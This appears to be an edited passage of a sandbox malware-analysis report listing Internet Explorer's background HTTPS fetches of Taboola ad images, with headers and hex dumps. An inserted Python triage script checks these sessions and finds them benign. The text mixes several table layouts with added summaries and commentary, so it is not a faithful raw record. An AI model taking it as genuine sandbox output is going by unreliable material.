                                                2021-09-10 09:28:24 UTC11OUTGET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fimages.maennersache.de%2Fkunde-will-150-packungen-klopapier-umtauschen-john-paul-drake%2Cid%3D73f41081%2Cb%3Dmaennersache%2Cw%3D1600%2Crm%3Dsk.jpeg HTTP/1.1
                                                Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                Accept-Language: en-US
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                Accept-Encoding: gzip, deflate
                                                Host: img.img-taboola.com
                                                Connection: Keep-Alive
                                                2021-09-10 09:28:24 UTC13INHTTP/1.1 200 OK
                                                Connection: close
                                                Content-Length: 33310
                                                Server: nginx
                                                Content-Type: image/jpeg
                                                access-control-allow-headers: X-Requested-With
                                                access-control-allow-origin: *
                                                edge-cache-tag: 472892736572853848016818289116622835340,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70
                                                etag: "d6ad21bee6a9518a4eff957695ef06c8"
                                                last-modified: Fri, 13 Aug 2021 07:45:15 GMT
                                                status: 200 OK
                                                timing-allow-origin: *
                                                x-ratelimit-limit: 101
                                                x-ratelimit-remaining: 100
                                                x-ratelimit-reset: 1
                                                x-request-id: 3e3a648c4b850acdc2c9021f884eeb16
                                                x-envoy-upstream-service-time: 22
                                                X-backend-name: CH_DIR:3FP7YNX3LMizprTZsG7BSW--F_CH_nlb804
                                                Via: 1.1 varnish, 1.1 varnish
                                                Cache-Control: public, max-age=31536000
                                                Accept-Ranges: bytes
                                                Date: Fri, 10 Sep 2021 09:28:24 GMT
                                                Age: 1471129
                                                X-Served-By: cache-wdc5552-WDC, cache-dca17772-DCA, cache-hhn4029-HHN
                                                X-Cache: HIT, HIT, HIT
                                                X-Cache-Hits: 1, 1, 1
                                                X-Timer: S1631266105.681016,VS0,VE1
                                                Vary: ImageFormat
                                                X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fimages.maennersache.de%2Fkunde-will-150-packungen-klopapier-umtauschen-john-paul-drake%2Cid%3D73f41081%2Cb%3Dmaennersache%2Cw%3D1600%2Crm%3Dsk.jpeg
                                                X-vcl-time-ms: 1
                                                2021-09-10 09:28:24 UTC14INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 06 06 06 06 06 06 06 07 07 06 09 0a 09 0a 09 0d 0c 0b 0b 0c 0d 14 0e 0f 0e 0f 0e 14 1f 13 16 13 13 16 13 1f 1b 21 1b 19 1b 21 1b 31 26 22 22 26 31 38 2f 2d 2f 38 44 3d 3d 44 56 51 56 70 70 96 01 08 08 08 08 09 08 09 0a 0a 09 0d 0e 0c 0e 0d 13 11 10 10 11 13 1c 14 16 14 16 14 1c 2b 1b 1f 1b 1b 1f 1b 2b 26 2e 25 23 25 2e 26 44 35 2f 2f 35 44 4e 42 3e 42 4e 5f 55 55 5f 77 71 77 9c 9c d1 ff c2 00 11 08 01 37 00 cf 03 01 11 00 02 11 01 03 11 01 ff c4 00 36 00 00 02 03 01 01 01 01 01 00 00 00 00 00 00 00 00 05 06 03 04 07 02 01 08 00 09 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 02 03 01 04 05 00 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 78 b5 4f 31 d2 ca 0b 8f b3 ed 84 97
                                                Data Ascii: JFIF!!1&""&18/-/8D==DVQVpp++&.%#%.&D5//5DNB>BN_UU_wqw76xO1
[21 further Data Raw rows, 2021-09-10 09:28:24 UTC, kBytes 15 to 42, direction IN: continuation of the image/jpeg body (Content-Length: 33310); binary hex and its Data Ascii rendering, which reduces non-text bodies to noise]
                                                Data Ascii: $q>`g`1\8iyNpq[KI&h4JJ\sP1' 0iYc*:I?+FibmN)3uTrmR.>#=H&Im7P"y"9_v9JiZ0&?0`$#n8s+rMuwsnIs1
                                                2021-09-10 09:28:24 UTC44INData Raw: 8a 28 08 59 6e 6c 12 55 4c bf 16 5d 33 45 f5 d5 16 9f 66 34 d2 cb 77 e0 87 c3 78 8e 16 50 0c 2e 36 8d 79 a9 e1 9a d4 54 59 5d 89 98 87 24 cb 19 81 82 fd 60 ad 66 db c7 6e d5 58 ed e5 98 ad ce 77 3f f7 28 e7 a8 61 82 3e c0 47 a6 c6 b5 40 c7 04 11 b0 cf 53 41 22 90 28 95 06 fa 75 ed 9f f0 fc bb 76 db ec 58 20 e2 e5 e6 64 67 0a 39 f2 4d cd 3b c4 16 5e 16 b0 55 94 0d cb 00 09 01 b6 cd 4f 1f 8a 5a 5f b3 cf 1d ca f9 2f 6d 66 00 11 d8 14 20 ab 77 06 a7 36 46 e2 3f 85 49 47 de a4 77 1a da 0d 43 dd 1a 26 f5 15 b2 b3 36 0f 3e 1b fc eb ee a7 7a 42 63 90 07 5d 38 47 68 8e ad c0 e4 71 b8 35 2e 99 1d f5 00 ba 19 40 19 ce 3a 91 be f4 8c 36 81 e7 8b 1a 64 6c 63 0e 07 27 14 36 99 a2 9f d9 b6 60 4f ee 68 aa 5d 44 6d df df 90 27 f7 14 e2 68 a1 33 5b 91 b3 71 a0 22 68 ff 00
                                                Data Ascii: (YnlUL]3Ef4wxP.6yTY]$`fnXw?(a>G@SA"(uvX dg9M;^UOZ_/mf w6F?IGwC&6>zBc]8Ghq5.@:6dlc'6`Oh]Dm'h3[q"h
                                                2021-09-10 09:28:24 UTC45INData Raw: 8f 87 ce 11 ca b4 d0 dc ae 54 3b 8d c2 17 45 18 a4 88 47 e1 71 48 49 7d 7c 37 b4 90 ab 6b 6f cc c2 55 a6 8e da ee ee 6c b2 80 b8 60 04 c0 6f cb 2a e2 81 f2 ea 38 ee db ff 00 83 cc de 55 a9 2d ad e7 19 85 9d 70 d2 0e ea 0d 69 d5 f3 77 3e e6 b4 e3 91 ac 38 1c bb 8e e3 ec cd c5 c9 e0 40 07 32 cd cc 8a f3 46 b9 90 fe 69 1b 76 3f 60 54 50 59 98 f2 0a 37 24 d0 48 13 36 5e 1c cc 32 ca 8b b3 32 2d 1d ce 59 89 cb 31 ee c6 a1 b7 11 36 6d ee a5 71 13 44 fe 8c 48 ab 7f 8f 49 3e 22 d7 c5 a1 90 5c db dd ac 78 3c 2b 95 8f 38 63 8f af e2 ac 5a df 12 23 b5 d7 94 45 97 cd f7 04 81 82 8c 7c a3 b5 3c cf b5 bc cc 40 69 90 c5 83 87 c7 32 a5 72 1a 86 a7 0a ce 8b b6 9b 88 01 25 7f e4 ba 85 12 f1 c0 67 b4 6d 47 06 19 f0 4e df 41 41 92 78 7e f1 5b 60 49 18 71 4e a9 e1 d6 f2 47 70
                                                Data Ascii: T;EGqHI}|7koUl`o*8U-piw>8@2Fiv?`TPY7$H6^22-Y16mqDHI>"\x<+8cZ#E|<@i2r%gmGNAAx~[`IqNGp
                                                2021-09-10 09:28:24 UTC46INData Raw: 80 3f 09 a1 32 1b b6 68 5f 9f 04 c8 75 86 2a 72 18 6f ca ae e1 8e 4b e6 8a c2 ed 08 43 02 dd 36 86 60 8b b8 07 b0 34 65 bb 04 eb bd 9f cf 33 1e b8 fc b5 14 11 34 8d 23 22 0d 8b b7 32 69 1f c3 67 2b 0d ed 8b 9c 20 d6 76 51 fa 49 dd 48 dd 0d 41 73 e1 fe 21 a9 6c ae 5a 3d 17 11 ba b6 96 86 52 98 27 49 db 50 af 15 b2 d2 30 23 32 fc 44 03 fe 12 e6 a4 bc f1 4b bd 5c 4b 99 ce 1d c0 f5 e4 88 3f 28 ae 2c ec 30 65 23 18 1f 95 07 e1 5f b1 4d e3 26 b7 77 f9 20 8c fe 2c 1f 98 f6 14 d2 3c 87 54 d3 3e ef 2b 77 63 5a 63 45 2c e7 b2 a8 c9 a2 9e 18 43 13 0b 1f 9a 38 d7 59 91 87 e7 39 da b8 57 0d 10 45 93 5b 48 1a 35 e8 ba 89 2b 44 4d 78 c2 cd 08 e8 1c 12 e7 ff 00 10 45 71 af a7 4e 29 8f 3a 43 48 f8 77 25 bf 48 da bf ff d9
                                                Data Ascii: ?2h_u*roKC6`4e34#"2ig+ vQIHAs!lZ=R'IP0#2DK\K?(,0e#_M&w ,<T>+wcZcE,C8Y9WE[H5+DMxEqN):CHw%H


                                                Session ID: 3
                                                Source: 192.168.2.5:49819
                                                Destination: 151.101.1.44:443
                                                Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                2021-09-10 09:28:24 UTC | 12 | OUT | GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fconsole.brax-cdn.com%2Fcreatives%2Fb9476698-227d-4478-b354-042472d9181c%2Fimages%2F824258cd-2488-4e7c-b171-dad87f56f610_1000x600.jpeg HTTP/1.1
                                                Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                Accept-Language: en-US
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                Accept-Encoding: gzip, deflate
                                                Host: img.img-taboola.com
                                                Connection: Keep-Alive
                                                2021-09-10 09:28:24 UTC | 47 | IN | HTTP/1.1 200 OK
                                                Connection: close
                                                Content-Length: 16421
                                                Server: nginx
                                                Content-Type: image/jpeg
                                                access-control-allow-headers: X-Requested-With
                                                access-control-allow-origin: *
                                                edge-cache-tag: 602770203899579805985979531162266752360,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70
                                                etag: "d2c20bf7706c810f628219875d8fd66e"
                                                last-modified: Thu, 09 Sep 2021 10:09:46 GMT
                                                status: 200 OK
                                                timing-allow-origin: *
                                                x-ratelimit-limit: 101
                                                x-ratelimit-remaining: 100
                                                x-ratelimit-reset: 1
                                                x-request-id: 8f8b2bee81a4ace00bdbca0cc35fc00b
                                                x-envoy-upstream-service-time: 22
                                                X-backend-name: CH_DIR:3FP7YNX3LMizprTZsG7BSW--F_CH_nlb802
                                                Via: 1.1 varnish, 1.1 varnish
                                                Cache-Control: public, max-age=31536000
                                                Accept-Ranges: bytes
                                                Date: Fri, 10 Sep 2021 09:28:24 GMT
                                                Age: 81973
                                                X-Served-By: cache-wdc5545-WDC, cache-dca17757-DCA, cache-hhn4051-HHN
                                                X-Cache: HIT, HIT, HIT
                                                X-Cache-Hits: 1, 1, 1
                                                X-Timer: S1631266105.706204,VS0,VE1
                                                Vary: ImageFormat
                                                X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fconsole.brax-cdn.com%2Fcreatives%2Fb9476698-227d-4478-b354-042472d9181c%2Fimages%2F824258cd-2488-4e7c-b171-dad87f56f610_1000x600.jpeg
                                                X-vcl-time-ms: 1
                                                2021-09-10 09:28:24 UTC | 48 | IN | Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 05 05 05 06 06 06 06 08 09 08 09 08 0c 0b 0a 0a 0b 0c 12 0d 0e 0d 0e 0d 12 1b 11 14 11 11 14 11 1b 18 1d 18 16 18 1d 18 2b 22 1e 1e 22 2b 32 2a 28 2a 32 3c 36 36 3c 4c 48 4c 64 64 86 01 05 05 05 05 05 05 06 06 06 06 08 09 08 09 08 0c 0b 0a 0a 0b 0c 12 0d 0e 0d 0e 0d 12 1b 11 14 11 11 14 11 1b 18 1d 18 16 18 1d 18 2b 22 1e 1e 22 2b 32 2a 28 2a 32 3c 36 36 3c 4c 48 4c 64 64 86 ff c2 00 11 08 01 37 00 cf 03 01 22 00 02 11 01 03 11 01 ff c4 00 36 00 00 02 02 03 01 01 01 00 00 00 00 00 00 00 00 00 05 06 04 07 00 02 03 08 01 09 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 41 0a 58 44 58 bb 12 cb 26 82 8c 92
                                                The first chunk is a JFIF header (ff d8 ff e0, then the "JFIF" identifier 4a 46 49 46) followed by a DQT segment and a SOF2 progressive frame header, ff c2 00 11 08 01 37 00 cf: 8-bit samples, 0x0137 = 311 rows by 0x00cf = 207 columns, which matches the h_311,w_207 transform in the request path and the declared Content-Type: image/jpeg.
                                                2021-09-10 09:28:24 UTC | 49-63 | IN | Data Raw: eleven further chunks of JPEG scan data (binary image payload, not reproduced); the portion shown in the report stops before the ff d9 end-of-image marker.


                                                Session ID: 4
                                                Source: 192.168.2.5:49820
                                                Destination: 151.101.1.44:443
                                                Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                2021-09-10 09:28:24 UTC | 12 | OUT | GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5c635ff03c0adc713f159b2abe690081.png HTTP/1.1
                                                Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                Accept-Language: en-US
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                Accept-Encoding: gzip, deflate
                                                Host: img.img-taboola.com
                                                Connection: Keep-Alive
                                                2021-09-10 09:28:24 UTC | 65 | IN | HTTP/1.1 200 OK
                                                Connection: close
                                                Content-Length: 8658
                                                Server: nginx
                                                Content-Type: image/jpeg
                                                access-control-allow-headers: X-Requested-With
                                                access-control-allow-origin: *
                                                edge-cache-tag: 525156711772851115999011001107512376604,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70
                                                etag: "c6bc11b268d6766bcb803638e4af9d98"
                                                expiration: expiry-date="Fri, 13 Aug 2021 00:00:00 GMT", rule-id="delete fetch for taboola after 30 days"
                                                last-modified: Tue, 13 Jul 2021 05:11:02 GMT
                                                timing-allow-origin: *
                                                x-ratelimit-limit: 101
                                                x-ratelimit-remaining: 100
                                                x-ratelimit-reset: 1
                                                x-envoy-upstream-service-time: 9
                                                X-backend-name: US_DIR:3FP7YNX3LMizprTZsG7BSW--F_US_nlb102
                                                Via: 1.1 varnish, 1.1 varnish
                                                Cache-Control: public, max-age=31536000
                                                Accept-Ranges: bytes
                                                Date: Fri, 10 Sep 2021 09:28:24 GMT
                                                Age: 2500602
                                                X-Served-By: cache-wdc5550-WDC, cache-dca17741-DCA, cache-hhn4043-HHN
                                                X-Cache: HIT, HIT, HIT
                                                X-Cache-Hits: 1, 1, 1
                                                X-Timer: S1631266105.717911,VS0,VE1
                                                Vary: ImageFormat
                                                X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5c635ff03c0adc713f159b2abe690081.png
                                                X-vcl-time-ms: 1
                                                2021-09-10 09:28:24 UTC | 67 | IN | Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 03 03 03 03 03 03 04 04 04 04 05 05 05 05 05 07 07 06 06 07 07 0b 08 09 08 09 08 0b 11 0b 0c 0b 0b 0c 0b 11 0f 12 0f 0e 0f 12 0f 1b 15 13 13 15 1b 1f 1a 19 1a 1f 26 22 22 26 30 2d 30 3e 3e 54 01 03 03 03 03 03 03 04 04 04 04 05 05 05 05 05 07 07 06 06 07 07 0b 08 09 08 09 08 0b 11 0b 0c 0b 0b 0c 0b 11 0f 12 0f 0e 0f 12 0f 1b 15 13 13 15 1b 1f 1a 19 1a 1f 26 22 22 26 30 2d 30 3e 3e 54 ff c2 00 11 08 01 37 00 cf 03 01 22 00 02 11 01 03 11 01 ff c4 00 36 00 00 01 04 03 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 06 04 07 08 09 05 0a 01 01 01 00 03 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 04 05 03 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 e9 d2 53 34 44 aa 42 4c 10 93 04 24
                                                As in session 3, the first chunk is a JFIF header with a DQT segment and a SOF2 frame header ff c2 00 11 08 01 37 00 cf (311 rows by 207 columns, matching h_311,w_207 in the request path). The path names a .png source file, but the f_jpg transform parameter asks the CDN for a JPEG, so the Content-Type: image/jpeg and the ff d8 ff e0 magic agree with each other rather than with the extension; this is a transform, not a disguised payload.
                                                2021-09-10 09:28:24 UTC | 68-75 | IN | Data Raw: six further chunks of JPEG scan data (binary image payload, not reproduced); the portion shown in the report stops before the ff d9 end-of-image marker.
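Triage of the sessions above, as an added worked example (not part of the Joe Sandbox report and not a Joe Sandbox tool). It takes the run-together session rows and the first 163 bytes of each response body from sessions 3 and 4, shows that the flattened columns cannot be split reliably without pinning the sandbox host (192.168.2.5) and the proxied port (443), both assumptions read off the sessions themselves, and then runs the checks an analyst makes before dismissing a session as background noise: the originating process against the sample's process tree, the declared Content-Type against the body's magic bytes, the path extension against the body type, and the h_/w_ size in the transform path against the JPEG SOF header. The function names, the constants and the shortened request paths are the example's own.

```python
"""Triage of proxied HTTP sessions copied out of a sandbox report.

Added example; not part of the Joe Sandbox report and not a Joe Sandbox tool. Inputs are
sessions 3 and 4 above: the run-together session rows, request line, response status/type
and the first 163 bytes of each body. Assumed, not stated on the page: the sandbox host is
192.168.2.5 and the streams were proxied on port 443; SAMPLE_PROCS is the process tree."""
import re
from itertools import product

SAMPLE_PROCS = {"loaddll32.exe", "cmd.exe", "rundll32.exe"}
MAGIC = {b"\xff\xd8\xff": "image/jpeg", b"\x89PNG\r\n\x1a\n": "image/png", b"GIF8": "image/gif",
         b"MZ": "application/x-dosexec", b"PK\x03\x04": "application/zip"}
EXT_FOR = {"image/jpeg": ("jpg", "jpeg"), "image/png": ("png",), "image/gif": ("gif",)}
SOF = {0xC0, 0xC1, 0xC2, 0xC3, 0xC5, 0xC6, 0xC7, 0xC9, 0xCA, 0xCB, 0xCD, 0xCE, 0xCF}
PREFIX = "/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/"
JFIF = "ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 "
SOF2 = " ff c2 00 11 08 01 37 00 cf"   # body = SOI, APP0, one DQT (tables 0/1 differ only in id), SOF2
DQT3 = ("05 05 05 05 05 05 06 06 06 06 08 09 08 09 08 0c 0b 0a 0a 0b 0c 12 0d 0e 0d 0e 0d 12 1b 11 14 "
        "11 11 14 11 1b 18 1d 18 16 18 1d 18 2b 22 1e 1e 22 2b 32 2a 28 2a 32 3c 36 36 3c 4c 48 4c 64 64 86")
DQT4 = ("03 03 03 03 03 03 04 04 04 04 05 05 05 05 05 07 07 06 06 07 07 0b 08 09 08 09 08 0b 11 0b 0c "
        "0b 0b 0c 0b 11 0f 12 0f 0e 0f 12 0f 1b 15 13 13 15 1b 1f 1a 19 1a 1f 26 22 22 26 30 2d 30 3e 3e 54")
SESSIONS = [  # "..." stands for the elided middle of each request path
    {"row": r"3192.168.2.549819151.101.1.44443C:\Program Files (x86)\Internet Explorer\iexplore.exe",
     "request": "GET " + PREFIX + ".../824258cd-2488-4e7c-b171-dad87f56f610_1000x600.jpeg HTTP/1.1",
     "response": ["HTTP/1.1 200 OK", "Content-Length: 16421", "Content-Type: image/jpeg"],
     "body": bytes.fromhex(JFIF + "00 " + DQT3 + " 01 " + DQT3 + SOF2)},
    {"row": r"4192.168.2.549820151.101.1.44443C:\Program Files (x86)\Internet Explorer\iexplore.exe",
     "request": "GET " + PREFIX + ".../5c635ff03c0adc713f159b2abe690081.png HTTP/1.1",
     "response": ["HTTP/1.1 200 OK", "Content-Length: 8658", "Content-Type: image/jpeg"],
     "body": bytes.fromhex(JFIF + "00 " + DQT4 + " 01 " + DQT4 + SOF2)},
]

def _ips(s, i):
    # Yield (dotted quad, end index) for every valid IPv4 literal that starts at s[i].
    for lens in product((1, 2, 3), repeat=4):
        j, octets = i, []
        for n in lens:
            o = s[j:j + n]
            if len(o) != n or not o.isdigit() or int(o) > 255 or (n > 1 and o[0] == "0"):
                break
            octets.append(o)
            j += n + 1                                    # step over the separator
        if len(octets) == 4 and s[i:j - 1] == ".".join(octets):
            yield ".".join(octets), j - 1

def _ports(s, i):
    # Yield (port, end index) for every 1-5 digit run at s[i] that is a valid port number.
    yield from ((int(s[i:i + n]), i + n) for n in range(1, 6)
                if s[i:i + n].isdigit() and len(s[i:i + n]) == n and int(s[i:i + n]) <= 65535 and s[i] != "0")

def candidate_parses(row, sandbox_ip, proxied_port=None):
    """Every split of '<sid><src><sport><dst><dport><process>' the constraints allow. The text is
    ambiguous on its own (151.101.1.44:443 vs 151.101.1.4:4443): pin the host, and the port too."""
    m = re.search(r"[A-Za-z]:\\", row)                    # process path starts at the drive letter
    num, proc, out = row[:m.start()], row[m.start():], []
    for n in range(1, len(num)):
        if not num[:n].isdigit():
            break
        for src, i in _ips(num, n):
            for sport, j in (_ports(num, i) if src == sandbox_ip else ()):
                for dst, k in _ips(num, j):
                    for dport, end in _ports(num, k):
                        if end == len(num) and proxied_port in (None, dport):
                            out.append(dict(sid=int(num[:n]), src=src, sport=sport,
                                            dst=dst, dport=dport, process=proc))
    return out

def parse_session_row(row, sandbox_ip, proxied_port):
    found = candidate_parses(row, sandbox_ip, proxied_port)
    if len(found) != 1:
        raise ValueError(f"{len(found)} parses for {row!r}: {found}")
    return found[0]

def jpeg_dimensions(data):
    """Walk the segment chain to the first SOFn marker; return (height, width) or None."""
    i = 2 if data[:2] == b"\xff\xd8" else len(data)
    while i + 4 <= len(data) and data[i] == 0xFF:
        marker, seglen = data[i + 1], int.from_bytes(data[i + 2:i + 4], "big")
        if marker in SOF and i + 9 <= len(data):
            return int.from_bytes(data[i + 5:i + 7], "big"), int.from_bytes(data[i + 7:i + 9], "big")
        i += 2 + seglen

def sniff(data):
    return next((mime for magic, mime in MAGIC.items() if data.startswith(magic)), "unknown")

def triage(entry, sandbox_ip="192.168.2.5", proxied_port=443):
    """One verdict per session: who sent it, and whether the response is what it claims to be."""
    sess = parse_session_row(entry["row"], sandbox_ip, proxied_port)
    declared = next((l.split(":", 1)[1].strip() for l in entry["response"] if l.lower().startswith("content-type:")), "")
    sniffed, path = sniff(entry["body"]), entry["request"].split()[1]
    proc, ext = sess["process"].rsplit("\\", 1)[-1].lower(), path.rsplit("/", 1)[-1].rpartition(".")[2].lower()
    got = jpeg_dimensions(entry["body"]) if sniffed == "image/jpeg" else None
    size = re.search(r"h_(\d+)%2Cw_(\d+)", path)           # size the CDN transform was asked for
    want = (int(size[1]), int(size[2])) if size else None
    findings = ["sample process tree" if proc in SAMPLE_PROCS else f"background traffic ({proc})"]
    if declared != sniffed:
        findings.append(f"declared {declared} but body magic says {sniffed}")
    if ext and ext not in EXT_FOR.get(sniffed, ()):
        findings.append(f"path ends in .{ext} but body is {sniffed}")
    if want and got and want != got:
        findings.append(f"requested {want} but SOF header says {got}")
    return {"sid": sess["sid"], "dst": f"{sess['dst']}:{sess['dport']}", "declared": declared,
            "sniffed": sniffed, "dimensions": got, "findings": findings}
```

Both sessions come back as background traffic from iexplore.exe carrying a JPEG whose SOF2 header reads 311 by 207, the size named by h_311,w_207 in the request path. Session 4 is flagged only because its path ends in .png while the body is a JPEG; the f_jpg transform in the same path explains that, so the extension check is a prompt to look, not a verdict. Without the port constraint the row parser returns two candidates (151.101.1.44:443 and 151.101.1.4:4443), which is why flattened sandbox tables should never be regex-split on digits alone. None of the sample's own processes (loaddll32.exe, rundll32.exe) appear in these sessions.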


                                                Session ID: 5
                                                Source: 192.168.2.5:49817
                                                Destination: 151.101.1.44:443
                                                Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                2021-09-10 09:28:24 UTC | 61 | OUT | GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fc3cfcb8c707b14064f9cad58b478df43.jpg HTTP/1.1
                                                Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                Accept-Language: en-US
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                Accept-Encoding: gzip, deflate
                                                Host: img.img-taboola.com
                                                Connection: Keep-Alive
                                                2021-09-10 09:28:24 UTC | 75 | IN | HTTP/1.1 200 OK
                                                Connection: close
                                                Content-Length: 16005
                                                Server: nginx
                                                Content-Type: image/jpeg
                                                access-control-allow-headers: X-Requested-With
                                                access-control-allow-origin: *
                                                edge-cache-tag: 576534902803110021316724602264134556124,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70
                                                etag: "31d2c3f7be156b4e917d219f6adce3aa"
                                                last-modified: Sun, 29 Aug 2021 10:39:28 GMT
                                                status: 200 OK
                                                timing-allow-origin: *
                                                x-ratelimit-limit: 101
                                                x-ratelimit-remaining: 99
                                                x-ratelimit-reset: 1
                                                x-request-id: 20be02d4eabb87f8f2afdf746e337dba
                                                x-envoy-upstream-service-time: 303
                                                X-backend-name: CH_DIR:3FP7YNX3LMizprTZsG7BSW--F_CH_nlb801
                                                Via: 1.1 varnish, 1.1 varnish
                                                Cache-Control: public, max-age=31536000
                                                Accept-Ranges: bytes
                                                Date: Fri, 10 Sep 2021 09:28:24 GMT
                                                Age: 181126
                                                X-Served-By: cache-wdc5540-WDC, cache-dca12928-DCA, cache-hhn4052-HHN
                                                X-Cache: MISS, HIT, HIT
                                                X-Cache-Hits: 0, 1, 1
                                                X-Timer: S1631266105.730473,VS0,VE1
                                                Vary: ImageFormat
                                                X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fc3cfcb8c707b14064f9cad58b478df43.jpg
                                                X-vcl-time-ms: 1


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                6 | 192.168.2.5 | 49821 | 151.101.1.44 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                2021-09-10 09:28:24 UTC | 64 | OUT | GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F6375ef5dcb44b841a2c82f366826a986.jpeg HTTP/1.1
                                                Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                Accept-Language: en-US
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                Accept-Encoding: gzip, deflate
                                                Host: img.img-taboola.com
                                                Connection: Keep-Alive
                                                2021-09-10 09:28:24 UTC | 100 | IN | HTTP/1.1 200 OK
                                                Connection: close
                                                Content-Length: 26657
                                                Server: nginx
                                                Content-Type: image/jpeg
                                                access-control-allow-headers: X-Requested-With
                                                access-control-allow-origin: *
                                                edge-cache-tag: 467157528030215451734401040394553622763,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70
                                                etag: "4559f937497c9db5ab43d5231d803695"
                                                expiration: expiry-date="Sun, 22 Aug 2021 00:00:00 GMT", rule-id="delete fetch for taboola after 30 days"
                                                last-modified: Thu, 22 Jul 2021 08:16:46 GMT
                                                timing-allow-origin: *
                                                x-ratelimit-limit: 101
                                                x-ratelimit-remaining: 100
                                                x-ratelimit-reset: 1
                                                x-envoy-upstream-service-time: 24
                                                X-backend-name: CH_DIR:3FP7YNX3LMizprTZsG7BSW--F_CH_nlb801
                                                Via: 1.1 varnish, 1.1 varnish
                                                Cache-Control: public, max-age=31536000
                                                Accept-Ranges: bytes
                                                Date: Fri, 10 Sep 2021 09:28:24 GMT
                                                Age: 1642925
                                                X-Served-By: cache-wdc5531-WDC, cache-dca17778-DCA, cache-hhn4057-HHN
                                                X-Cache: HIT, HIT, HIT
                                                X-Cache-Hits: 1, 1, 1
                                                X-Timer: S1631266105.734114,VS0,VE1
                                                Vary: ImageFormat
                                                X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F6375ef5dcb44b841a2c82f366826a986.jpeg
                                                X-vcl-time-ms: 1
                                                Data Ascii: Ai4- w"Ik ?;exj7qb}2 }/O."2},G%p7PGPZS-NCXRf]bj=w/h qDV9v^NiU?:f:R-#z?$M_C$@zWv>YXx\3KC$}B
